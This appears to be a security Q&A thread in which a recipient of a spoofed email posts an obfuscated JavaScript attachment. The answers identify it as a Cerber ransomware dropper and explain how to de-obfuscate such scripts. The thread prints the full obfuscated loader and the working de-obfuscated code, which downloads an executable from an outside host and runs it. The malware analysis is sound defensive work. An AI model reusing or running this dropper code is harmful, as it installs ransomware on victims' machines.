De-obfuscation of malicious javascript in spoofed eMail

Question

Two days ago, I received a suspicious email.

The sender was a mailing list, that i am a member of, but it originated from a webhosters subdomain (applegate.dreamhost.com). The content was roughly related to an earlier discussion on that mailing list (see content below).

The mail contained a link to a .zip file with my full name in it and entitled as .doc document with .js file extension.

Usually I just ignore such mails, but what made me suspicious was the fact that the email was related to an earlier discussion and contained my full name, which is neither registered to that account nor did I ever use it in any mail on that list.

So I decided to have a look at it and downloaded the zip.

Now I have an obfuscated javascript file and I don't know how to go on from here.

The script consists of a huge unreadable alphanumeric string and a lot of string operations that seem to get the original content from that alphanumeric string. (see script below)

Mail Text:

"Re: [<list name obfuscated>] Kaffee"
<br>
<br>
<a href=3D"http://soldbychuck.com/<full path obfuscated>"><name obfuscated></a>

JavaScript:

function ddtcz()
{
    var qglpa="d4c6ec307dd1966e896bc517cf8361ce167c3566e6428b496fcdb6db6f7cfde4ccc769e3a7cec269a324ea047ac8067dcc65a4a5df6e7af3c64d9920a7b7df697af7a64e8524adb28f796bd9c69b6364a1564ead6aca469b606bf3163c2821d4673cec7ce867adaa71fcb73ab67ee4169a677af1028f7b70bef65d6d64c4640ff17ccbc7cac978cab28cc235e9228c5866b886da2d7fe8228b3e49b9a6ba087cde261b8f7ec686dcdb50e1447c256ab1c62c6e6dca86bac17cc6120da92ad1d45e8a5bf7a50efc45b3d44e833aedd26cd050c6e45df044a8040e725cd395cb1758e592af4121e3d33f9b70c1165b9e64e9740c7d7cdfe7ca2178ce526eb967aaa78e746ddb466d1b20df52aa6a4fef94deea5ce7a2aa6624d6128b577ddf27af9364c3124f4628c246eee469dd064b1f7bda56dd1021e9833a4e70bb365b8664dd840ec77ca657cd0578d3e26ebe7bcb96decc66e186ce5f20cdb21fb933bbf61c686effa28fb620f3170b1d65adf64dd340c317caeb7cf3878dad26a8b7bf587ca1a69a6a7ce787dee67ba6828a9835f4035bc528acc3ae8138b8238e0821d9f28a6d73c647ae7b6db3f7ce7a7db987ae6f66aa728a0e6bd3969c4f64b0564c8a6abcc69ab46bfeb63be220aec70d2665da964a2b40e767cadc7cf1078d2626ec55ade56df247bc0678f2e67b2266a187bc366d"+
    "be74af0867a856cc2571fc624e4f28bee6eb5169c6164eb47bbf46ddad21ac533b4675dd26dec564f157bf506df0f73e807aaa86db437ca5f7dc027af3e66f2b28adb6bc0e69e6064e4164c5a6ae9f69a036beec63aae20e7166f9f7dcf864cdd64eb124a3528f1c7cd277af167dd1e6dd1721dbf33c3c75e0a75f066bf0869a697cfe06bbba60d6b28ddb20e786dfda7adc47ab8c67d567aa5b21d2a73b667affb6dd797cb5e7df2d7acb066de228b966bf0a69c3c64a5264c2e6aaa769dfa6bdac63c1920a0866af17dc0064aeb64e1e24a7228e9c7cc3a7aac57de456dc5d21f7c33ef675c1675ae76eaec7dbe666e586bd647ce3861b9b67a7366e4228b026fdb26dec17cf1e4cae569d007cf9c69bb620acb6baaf69bd964c7564c726ac3269c426bfca63b0321adf73cda7cb157aa4371f0073eee6fa836daf77cb034cefc69a207ce9869dc84eefb7aaa567d0565dac5dfca7aae464bd320ad42afcc60a607cd597cc5378ffb32e8727f3327c527fd0e7ff0c7fa5026e7e6fc246de887aa2769e2d64bd16cc466fddf67ca87abbc6de9426f156baeb67d2d65eef27f4b66f0e6da2c7fa977bdc327bab39c8b3ff8a26c1b6dbfb70bbf6de982aea024fa228a3f6eb897deee66fb86bc487ca9761fc267fba66ba520f7f7ae926dfd97bcd87dc9464fd77cbee24fbb28e776dc027af687a"+
"d4167f1f7ab6b21fb428e9273bd161b9c6ee7428cfc20ca329e576dae77ae4c7adf867ede7ae3c21e7673f7b7aec06df447ce497db487ad2b66cba28e086be9069d8164e4764d336abf769dca6ba1d63dae20b2b7aee56dbcc7be757de6964c1a7cd5024ec628dd76ec6269c0364b737bcbf6dba621d0b33aeb75f9e6db9c64f307baae6da2973b5e6fcca6dc167cf9e4cc0e69a597ca0169e544ed6d7ac9e67ad565e515dda17aa6964eb320ed72ace160dd67cf6b7cdd478dd132fd527f8f27f847fc8e7fc7d7fedc26e606fb2e6deac7ab3a69be864dce6cc086ffef67d857ac736db6826fa06bfa467dd765b2627f0266f1b6daaa7fa637bbc927c1d39ed93fda326f416da7270c3a6ddda2abe624eea28a586edc87dcb666e5e6bae47ca2a61b0c67e3066d7920e787ad8c6da297bd957de9964eb97cad024f2428d166da0c7ad937aa3a67e5b7acd521fcd28bb973fd661ca86ed3828e6220fea29e3c6dd227ab9f7ad5b67c987ae5621bae73f437ab386dbf87cec07df6a7af0466f3928c916be8669bbe64b7464ca66aef469cd16be0663f6e20e227ac9a6dc837bfbd7df1564e8f7cb6d24dcb28dc56ee7a69e6b64ec57bd4c6dfe921db933eae75ee66df9264c2d7bd156dbd073ad76fc806da507cdf54cade69aae7cc6869dc04ec707adb867bc565d3c5db527affe64a1d20a392a"+
"a0f60d2a7ca727cf1d78a5a32cfc27b2127bff7fbee7fa127fd2b26d0c6fbb46db757aa9069fe864d406cd986fcd867ce87ad006db3326a6d6bba467dcc65a9c27d1e66b086df257fa947bd3d27b7139c873fbc126c6d6db8670e276de5e2ace124f2028ebb6eff37df4a66b776bbcb7cae461cf567fd066f4920ffa7acd66da047bb787de0d64bda7cafa24b6028d276dad07ada97ab2667d5e7ae9721b8128acd73edc61c226ea0428cb220a6c29d0f6de437ae1b7ab6467b9e7aa6d21edf73af87ab636dc897ca127dae57abd666e2a28a736ba9969e7664f8464bb06ac2169e526ba5163c9d20f7e7ac966dd0d7ba957dc6b64f087cb2024b2d28c436ec0a69b6164bc07bd636dc8b21ff133c0075efb6dc4d64b017bc106da6e73a9b7af216de997cd487dda17ab9e66e1328f5c6bfbd69bb364bdb64e9d6aa7769de06be9563abc20aad66b727da2c64e8964ab724fae28db77ce467ad4f7df5a6dd5621c8b33d8d75c6575e6e21b2a33ba675d0975a3c21ee133d0675e1c75f0521cf033fdf75f3e6bc7a69f157cb286ba1760aa128ca220b5a6dcc07aa077ae5967eae7ad7121ea273bb37afcc6df487ce7c7ddd97aad366dc728ab26ba5869a3364a8d64b306aafd69dc46bb5163e6f20efb66ce87dd1c64a2f64a4724e9928d087cc347ad787df5d6dd4c21cab33f3c75d3d75d626e"+
"e607dcf466e666baec7cdb261c6667bae66e8328f266fd0a6df9e7cbef5cdf46de1465fbf78f344ea7f61a7764b386ddc158b9969ad97ca7760b5820d1321cc673ffc7cde37aa4671cc373dea7ea2969d3f7ae8428c146ed817be3f28fcf35ec228b5f66ccd6dade7fd8328c8049ff06be927ce8561f327ef1d6df5350faf47dbc6ad6462dca6db896be617ce4920b1a2abbb5bb9e6bb4a7abb661e4a78bf87cf3e61c1566c196fe5926d054ebcc61b2e64e5b6db4e5be7d71c417bb027cde36daf765f8147ebc6affd62fc36dc166bcfc7cb512aca021c5033d897ee3e69e3a7aff028db77cf3765a0678efa4ee5561da064a416dd4446d4669be565e0e6db6328f7c35a6a28f4f2aac054dfd54f922ae2528b7423d5d28c0345d6969c8f7ca4260e5f26dfc7ac0569c8766fbc6ce4267fba65e6120cc821ccb26cce7cc6f67ac95bc4e7cfeb7adef61dc066bbe6fc4b20e093bd263ed8a21c0826eeb7beba7dd5a6adf87ba447ca977ae7e20cf23af8924cf228fd131dcc21b7228ee123c2428d4c2ae2326e826de3970d976dd752adf133c277ede669d687afdb28dcc7cfb465fb778b4e4efc661e7564ad76dc7658ffa69ba97ce3560fde28eaa35cef28cba6efb27babe26c364ffe46dc4f7ce415bbef78bf96de686bfb361c8f69d8064dfb4eeab67a3f64a336ca726deae7ad9520e613a"+
"bd821a7e28ded23cd928aeb7caed65a1478bed4eb8761c8c64da06debe46e6f69fbc65ccb6daca33eea7aa3a6de637cbca7da557ad5e66d4628d127cb6f65a6b78f4a4ec5c61a3264a8f6df9458a3869acb7cc7b60cb133cb775a706bfbf69cb17cdf96bcb160dc428ad120f476dcb27ad2d7ae4467dfe7ac6b21df073a657aae26dc1f7ccd37df6f7aef166fd428e726eed869d7664b7a7bd906ddda33d4975f1d75deb6edb97deae66e0d6bc447cf8a61c1367aa166f4528bf67ba9569e417ec2a6dc155cb8967c5e5cac16dada65b0d78cdc20fe66cac969a4a7cf9b69ab424d2828d346bd5269b8a64af964ea86abb569fc86bc9163a9c21c2f73f017ca357aa6c71f7b73b567ef9269a6f7acc728dff78b4169b1a7cb2c60c4328b1035e6f28c276fc2b6db097cf275cd706dd0a65bcc78a514eb9261f9764fd96da5058e0469c567cfeb60c0620af221ee733e4e61e186ecb628ed020db478f2969ad87cf5260a6121b3173d247ed2569a817ac7f28ee067bab6afb062b9d5bba37cbf67ab976dd2969f3165f8728f8635ba128a6c66d066dcde7fd3f28e7749be96bfba7cf9361b5a7ed056dd0a50c3447f026af3462d1a6da606bd367cbef20c332aebb49b654ceb847b714cb244aca426aa95bf4b7ce7a7aecd6dac069f2f65a1a2ac4121d8333ffc67e186adba62bb25be0d7cf0a7a"+
"c5b6db6c69ede65e7726a3647e3778cb26daec66ad620e0f21de433c4967a376aa3c62d5f5be317cb8c7ac9b6da0069c0465c4326d075cab071ddb78b7e6db5328b9035af328f1b39b8533dd967f826aa0d62d3a5bc827ccb67ac1f6da1c69bdc65e3526ba25ff597ae7361f157cc7c6ddc820e586cf7969da67cba869df321db833bad67c7d6aff562c715be567cc1b7ae966dcde69f7f65e2a26c5658bab67a6a7bcc161cb67cf3661c2f67e8b66e5328f4435ca928ff338c1933a7567ad16ac0362f255bffb7ccce7ad946dfff69b0d65c2d26e455bb6269bcb7ec0c6df5b5cca867c4e4eded61d5864bb06dbac20ce278d4f69b097ca5c60fa824b1a28baa3aa3f21d8033aa567e246aa0862ef25bcf67cba17adf26db2b69e2f65fa626cce4bfa264eab67c907bce86de3320ec121e2233fe47adcd6de407cee57deff7af6866bc728fa06be9669e9764a4764bc46abb869fa76ba0663e5a20c9878e5269c307cf3260b4624d9328ebd6eb9869f0264e077bd1e6daf421a6733f2975e6c6dbe664cd27bb2a6dfc428fbd73b6d7ab8b6dc017cf637db597aa8866cd528c176bab369c9f64bb564afb6af5669f2a6be7f63c8720ef466b757dd9e64ff864f2424e2328fd87cea97ad0f7dd176da1521b4b33cd475ca275e636bb5569be27cfec6bb0660b4728d4720e8a6dde97ae737ae6967"+
"a9d7acdc21d0b73bf67ad306dadd7ccc57da747af5066e5e28c786bbd569e6f64fad64a516af6d69dd06bfe163ea620d9066df17da2d64b2464bdd24af328a097ce267adf67ddf16de8921c1833d1975c6a75d986fc066dd0e7ca924cc1e69e0d7ce8669ce620e876ecdb7da7566dfd6be877ce0e61e2e67ee966ffe28a6f20c476ceb569ddb7ce7069f6124a4a28a4c6da3c7adea7ad2e67d047ae8e21a2c28ef373c0961cbb6eace28ed320f7229ce46dc8c7ad747ad9567b747acdd21e5073f877bf7469e3a7ee9a6dad35ce8967ae25cc596dfc665dca78a8320c496cf1a69ce37ca3169a2824f4828eac6ec697dfd566cec6bc7e7ca2161f8167e8366ea428c6820e4378d9869b567cc0560b2b24b3c28bd56dbcc7acb77af3c67b2e7abb921ffc28a7773ca961afa6ee4928b8620ef129ca46dac57aa217affe67c167ae8121c9e73a837cdaa7aea071a1473b317ed6269de17ad8128e687fec17bed860e9328d9c35b9c28cde66c756dce57fd8b28d6149a4d6ba1a7cd1461fab7ecd46db4250b0847c276af0d62c346dd376bb487cab920b732aed15fa245bb5c6bdbf7aa8861efa78a7c7cdbe26abb5bdf260fde6dfe164e3564fd12aff821bd733fec7fd997bd0460b3326cfe5acbe7dca266f8e20f3d78b5a69d2a7ccb360e5c21b9e33cef75c606bbb469c7b7cc3d6bb8360e2528"+
"c9e20d946dcbc7ac2b7ab8167fcb7aa4321f0628dcc73faf75a3775ede75b5a21e0c33fd575fb175cc521d9d33";
var jlusw;
while(true){
    try
    {
        jlusw=(new Function("rrxoc","var ujfnb=rrxoc"+wutob()+"/\\S{5}/g),amdeo=\"\",vrhqs"+wutob()+"ile(vrhqs<ujfnb"+wutob()+"gth){amdeo+"+wutob()+"e"+wutob()+"ujfnb[vrhqs].substr(3,2),16)^8);vrhqs++;}eval(amdeo);")(qglpa));
        break;
    }
    catch(er)
    {
    }
}
return jlusw;
}
function wutob()
{
    var nnyfm=new Array("_3da","_gda","=String.fromCharCod","(parseInt(",".match(","=0;wh",".len","_aas","-_ad");
return nnyfm[Math.floor(Math.random()*nnyfm.length)];
}
ddtcz();

Can anyone help me to find out what this script is doing or does anyone have and idea how an attacker could get these private data?

Would you think this is a targeted attack or just part of an automated attack?

No one else on the list received a similar mail. The mail account is from google and the mailing list is a googlegroup.

Arminius · Accepted Answer · 2017-01-09T02:15:14.880

This script attempts to infect your Windows computer with the Cerber ransomware.

The obfuscated Javascript segment downloads an executable from http://www.geraldgore.com/news/17.exe to a temporary file and runs it, employing Internet Explorer's ActiveX controls.

The Virustotal analysis of that binary suggest that it's a variant of the Cerber ransomware.

This is the de-obfuscated payload:

function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});

@Matthew You can often find a sink where - just before execution - the payload gets de-obfuscated. In this case there is the `eval(amdeo);` function inside that while loop which takes the entire payload as a string. You can just change `eval` to `console.log` to get the plain payload back. This way you don't have to fight with the obfuscation algorithm. For other obfuscation schemes, the approach would be different, though. — Arminius, Jan 09 '17 at 03:34
Thanks for your answer. With your information i found out that this payload was used to attack multiple people at the same day, so the attack probably wasn't targeted at me. I might post a new question tomorrow to find out possible ways how my personal data leaked. @Matthew From your interest i guess you received a similar mail, would you like to share details? — Malcolm X, Jan 09 '17 at 05:22
aside: i always replace `eval` with `prompt(1,`, which lets you copy the code from the popup textbox. nice of the attackers to use semantic var names, aren't they even trying anymore? — dandavis, Jan 09 '17 at 14:38
@dandavis Semantic names? AFAICS all variables had obfuscated names. — Arminius, Jan 09 '17 at 17:06
@Arminius: no, those are the same names in the OP's script (i decoded it too). the code was obfuscated, it should have also been uglified or _closure_ 'd to reduce space and remove meaningful names that tattle on the functionality. They are mostly amateur library JS functions, the kind people copy from w3fools... — dandavis, Jan 09 '17 at 22:13
@dandavis Ah, so you were referring to the payload which was not additionally obfuscated, true. — Arminius, Jan 09 '17 at 22:31
@Matthew There are tools you can use that will run malicious JS code in a sandbox environment and tell you everything it did. For example, Box-JS is a node.js based tool which wraps many common ActiveX features JScript malware tends to use and reports what the script did: https://github.com/CapacitorSet/box-js. I previously wrote a rudimentary webpage that does the same thing and reports the same information, but runs in-browser so I can debug scripts using Chrome DevTools: https://gist.github.com/jocopa3/092219dd8b3c57f7ebbf9eacdd28aa44 — jocopa3, Mar 01 '17 at 23:15

De-obfuscation of malicious javascript in spoofed eMail

1 Answers1

Linked

Related